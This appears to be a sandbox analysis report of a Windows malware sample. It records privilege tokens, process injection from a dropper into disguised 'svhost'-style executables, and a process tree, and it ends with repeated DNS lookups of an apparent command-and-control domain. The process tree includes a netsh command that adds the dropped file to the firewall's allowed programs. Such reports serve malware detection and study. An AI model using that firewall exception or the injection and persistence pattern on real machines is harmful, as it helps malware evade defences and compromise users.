Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2096 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe
PID 2096 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe
PID 2096 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe
PID 2096 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe
PID 2096 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe
PID 2096 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe
PID 2096 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe
PID 2096 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe
PID 2096 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe
PID 2096 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe
PID 2096 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe
PID 2096 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe
PID 2096 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe
PID 2096 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe
PID 2096 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe
PID 2096 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe
PID 2096 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe
PID 2096 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe
PID 2096 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe
PID 2096 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe
PID 2096 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2096 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2336 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2672 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 2792 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 2792 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 2792 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 2792 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe

"C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe"

C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe

"C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe"

C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe

"C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe"

C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe

"C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe"

C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe

"C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe

"C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe"

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe" 2196

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Users\Admin\Documents\excelsl.exe

"C:\Users\Admin\Documents\excelsl.exe"

C:\Windows\svehosts.exe

"C:\Windows\svehosts.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\svehosts.exe" "svehosts.exe" ENABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
